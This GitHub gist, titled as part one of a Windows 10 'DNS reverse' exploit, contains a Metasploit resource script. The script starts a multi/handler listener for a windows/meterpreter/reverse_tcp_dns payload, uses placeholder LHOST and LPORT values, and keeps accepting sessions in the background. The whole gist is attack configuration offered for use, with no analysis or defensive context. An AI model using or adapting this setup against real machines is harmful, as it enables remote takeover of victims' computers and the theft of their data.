Skip to content

Instantly share code, notes, and snippets.

@eltondev
Created December 20, 2016 19:57
Show Gist options
  • Save eltondev/ed5ef856ed6411ba45d2fbde74406d24 to your computer and use it in GitHub Desktop.
Save eltondev/ed5ef856ed6411ba45d2fbde74406d24 to your computer and use it in GitHub Desktop.
GHT's - Exploit Windows 10 Full DNS Reverse - 1ª Part
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp_dns
set LHOST IP_HERE
set LPORT PORT_HERE
set EXITFUNC thread
set ExitOnSession false
exploit -j -z
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment